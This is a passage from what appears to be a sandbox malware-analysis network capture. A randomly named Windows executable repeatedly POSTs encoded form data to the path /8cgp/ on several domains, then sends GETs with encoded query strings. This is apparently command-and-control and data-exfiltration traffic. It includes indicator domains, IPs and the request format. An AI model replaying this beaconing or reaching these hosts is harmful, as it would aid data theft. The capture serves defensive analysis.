                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.ogunlewefamily.org.ng
                                                                    Origin: http://www.ogunlewefamily.org.ng
                                                                    Referer: http://www.ogunlewefamily.org.ng/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=DkuSfPO7JzpHwE8szpc80uCTCpSvUVn75QdM3gTPQqP8a3xw5DrgZyPgRJ3AS/8y2+23cuMO3UY9ARd4gm6opQ/2qn6Lh38iEsLL/kGgRAbZM4azn94l2NkHMqZ+3wxAB2wH4aC17RqxtIONOGEoAL0QofJOgS+3+b067p537E/xF3jeMYlAnkkh+iPpQisnRw==
                                                                    Apr 24, 2024 12:30:12.210313082 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:30:11 GMT
                                                                    Server: Apache
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Vary: Accept-Encoding,User-Agent
                                                                    Content-Encoding: gzip
                                                                    Content-Length: 7038
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    26 | 192.168.11.20 | 50271 | 67.225.140.26 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:14.427356958 CEST | 1026 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.ogunlewefamily.org.ng
                                                                    Origin: http://www.ogunlewefamily.org.ng
                                                                    Referer: http://www.ogunlewefamily.org.ng/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:14.935365915 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:30:14 GMT
                                                                    Server: Apache
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Vary: Accept-Encoding,User-Agent
                                                                    Content-Encoding: gzip
                                                                    Content-Length: 7038
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    27 | 192.168.11.20 | 50272 | 67.225.140.26 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:17.193630934 CEST | 2578 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.ogunlewefamily.org.ng
                                                                    Origin: http://www.ogunlewefamily.org.ng
                                                                    Referer: http://www.ogunlewefamily.org.ng/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:19.747643948 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:30:17 GMT
                                                                    Server: Apache
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Vary: Accept-Encoding,User-Agent
                                                                    Content-Encoding: gzip
                                                                    Content-Length: 7038
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    28 | 192.168.11.20 | 50273 | 67.225.140.26 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:19.957406044 CEST | 398 | OUT | GET /8cgp/?QDnH=ERXP8&Xh9lX=OmGyc5P3HC4gilwd2aY8392rI7ekMFe8/FNw83qBYcD4CWN3uhWBPhzZSt3lBo5o5sC5ats8mUsRdTFftG6L4VjYphbRhm0WEo/D3mWtey64RraPnZAfyak= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.ogunlewefamily.org.ng
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:20.464931011 CEST | 512 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 24 Apr 2024 10:30:20 GMT
                                                                    Server: Apache
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    X-Redirect-By: WordPress
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Location: http://ogunlewefamily.org.ng/8cgp/?QDnH=ERXP8&Xh9lX=OmGyc5P3HC4gilwd2aY8392rI7ekMFe8/FNw83qBYcD4CWN3uhWBPhzZSt3lBo5o5sC5ats8mUsRdTFftG6L4VjYphbRhm0WEo/D3mWtey64RraPnZAfyak=
                                                                    Vary: User-Agent
                                                                    Content-Length: 0
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    29 | 192.168.11.20 | 50274 | 137.220.252.40 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:26.065649033 CEST | 656 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.387mfyr.sbs
                                                                    Origin: http://www.387mfyr.sbs
                                                                    Referer: http://www.387mfyr.sbs/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=75JDS6LxQg+Yh+Nio4Fa1tWmj366Rr+2NBZD3B9N3nUmM2GHgoV5n+psnf6fuglk6qYud9aNOnDN19e1Sg7ynQBXa/IrsR+JJ0HsCAyURhSxBIuAhNWMuEf4pYXDsn8U6GNxKXRamYb+OOMDmH7uP9D0knYeGBQQ4xJbJ+fJUKXuKxoRZMApuQP5NcFVrTv41g==
                                                                    Apr 24, 2024 12:30:26.334211111 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:30:26 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 146
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    30 | 192.168.11.20 | 50275 | 137.220.252.40 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:28.857877970 CEST | 996 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.387mfyr.sbs
                                                                    Origin: http://www.387mfyr.sbs
                                                                    Referer: http://www.387mfyr.sbs/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:29.126777887 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:30:28 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 146
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    31 | 192.168.11.20 | 50276 | 137.220.252.40 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:31.662067890 CEST | 1289 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.387mfyr.sbs
                                                                    Origin: http://www.387mfyr.sbs
                                                                    Referer: http://www.387mfyr.sbs/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:31.937854052 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:30:31 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 146
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    32 | 192.168.11.20 | 50277 | 137.220.252.40 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:34.466295958 CEST | 388 | OUT | GET /8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.387mfyr.sbs
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:34.735280037 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:30:34 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 146
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    33 | 192.168.11.20 | 50278 | 91.195.240.19 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:40.346885920 CEST | 659 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.nurenose.com
                                                                    Origin: http://www.nurenose.com
                                                                    Referer: http://www.nurenose.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:40.660209894 CEST | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:30:40 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    34 | 192.168.11.20 | 50279 | 91.195.240.19 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:43.177387953 CEST | 999 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.nurenose.com
                                                                    Origin: http://www.nurenose.com
                                                                    Referer: http://www.nurenose.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:43.488382101 CEST | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:30:43 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    35 | 192.168.11.20 | 50280 | 91.195.240.19 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:46.021651030 CEST | 2578 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.nurenose.com
                                                                    Origin: http://www.nurenose.com
                                                                    Referer: http://www.nurenose.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:46.333102942 CEST | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:30:46 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    36 | 192.168.11.20 | 50281 | 91.195.240.19 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:48.864064932 CEST | 389 | OUT | GET /8cgp/?QDnH=ERXP8&Xh9lX=gPmRQJtWqOniEM4QRYssNN1Z+6d7UeIsnmjN3YDy8B2ChygMtzhOiKO2U7rNAXgtrRM7pNM3lf9QxBLsAyZPQtIaU4REtcvgBDtZA8Dv/AhV5YtMj725a40= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.nurenose.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:49.435338020 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                    date: Wed, 24 Apr 2024 10:30:49 GMT
                                                                    content-type: text/html; charset=UTF-8
                                                                    transfer-encoding: chunked
                                                                    vary: Accept-Encoding
                                                                    x-powered-by: PHP/8.1.17
                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    pragma: no-cache
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_e8FT9kDHiyn9HlZslDLOcIZbVsAZx2Cism98LBpbY6Feesf/xsj7Mn9GTsh2HlprLFQkIIYE/Ra0gUT0Raubng==
                                                                    last-modified: Wed, 24 Apr 2024 10:30:49 GMT
                                                                    x-cache-miss-from: parking-55fd589654-8mkkq
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: 2CF<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_e8FT9kDHiyn9HlZslDLOcIZbVsAZx2Cism98LBpbY6Feesf/xsj7Mn9GTsh2HlprLFQkIIYE/Ra0gUT0Raubng==><head><meta charset="utf-8"><title>nurenose.com&nbsp;-&nbsp;nurenose Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="nurenose.com is your first and best source for all of the information youre looking for. From general topi


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    37 | 192.168.11.20 | 50282 | 91.195.240.123 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:55.275985956 CEST | 647 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.lm2ue.us
                                                                    Origin: http://www.lm2ue.us
                                                                    Referer: http://www.lm2ue.us/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=CF1V6xKZF+bbmuA+tbct+wpw73KXs2kljpMZiG6yZG3lP6JHdCjzZQxDRULCxp/mIRtJ43PRGUN97eVd5UJbHU0ZmCJNdnlEIWUXHlVXGK6v2btftOdr32z2ap9ll4XN1NN3d0EeFYaDZrg5uw9iMAwIR2/8PyQqIqQezVPPiO9kCeLF486twuAia34v7oJxmA==
                                                                    Apr 24, 2024 12:30:55.589925051 CEST | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:30:55 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    38 | 192.168.11.20 | 50283 | 91.195.240.123 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:30:58.112905025 CEST | 987 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.lm2ue.us
                                                                    Origin: http://www.lm2ue.us
                                                                    Referer: http://www.lm2ue.us/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:58.423721075 CEST | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:30:58 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    39 | 192.168.11.20 | 50284 | 91.195.240.123 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:31:00.955851078 CEST | 1289 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.lm2ue.us
                                                                    Origin: http://www.lm2ue.us
                                                                    Referer: http://www.lm2ue.us/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:31:01.267988920 CEST | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:31:01 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    40 | 192.168.11.20 | 50285 | 91.195.240.123 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:31:03.797589064 CEST | 385 | OUT | GET /8cgp/?Xh9lX=PHd15HH4KfPc0usCsZkSxG972lDJtR4Pjc4etW3YVFy3SYU2ewDgVW1TagnS2dO7KixciWH8BWdXpsVg20loSBMgq1tvcXpNFyUGPl5UEoDw0JtEo5FA5Us=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.lm2ue.us
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:31:04.284794092 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                    date: Wed, 24 Apr 2024 10:31:04 GMT
                                                                    content-type: text/html; charset=UTF-8
                                                                    transfer-encoding: chunked
                                                                    vary: Accept-Encoding
                                                                    x-powered-by: PHP/8.1.17
                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    pragma: no-cache
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_XsrXriPT+lqsz6daoOlcuknNJKgztUivWCC/iIPYwT4xmQjDUJmU5dJjS5h3XAcFoWxA9EyV7P6MPsKZtIQjJg==
                                                                    last-modified: Wed, 24 Apr 2024 10:31:03 GMT
                                                                    x-cache-miss-from: parking-55fd589654-8mkkq
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: 844<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_XsrXriPT+lqsz6daoOlcuknNJKgztUivWCC/iIPYwT4xmQjDUJmU5dJjS5h3XAcFoWxA9EyV7P6MPsKZtIQjJg==><head><meta charset="utf-8"><title>lm2ue.us&nbsp;-&nbsp;lm2ue Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="lm2ue.us is your first and best source for all of the information youre looking for. From general topics to more


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    41 | 192.168.11.20 | 50286 | 173.232.100.113 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:31:18.539649010 CEST | 653 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.whjzff.com
                                                                    Origin: http://www.whjzff.com
                                                                    Referer: http://www.whjzff.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=4OhDH7ATmEQk5yATRBadFGgkyfQtg7V5TPv1ciNC2kwo6EFNiDq4txQKxZpMTFlOGgrlZ82JT1xtYEIGy+kKCSxHs6fwv+gHZgMCtfAuSTGJ4k0yTxNmLiEejWGQ4x+tafZXye7OHNox87IPG8tOvVSPZSvzea+oG7D06UEkQVTZq3LEeDQf6bnPj6K1RjLRFA==
                                                                    Apr 24, 2024 12:31:18.704612017 CEST | 305 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:31:18 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 162
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
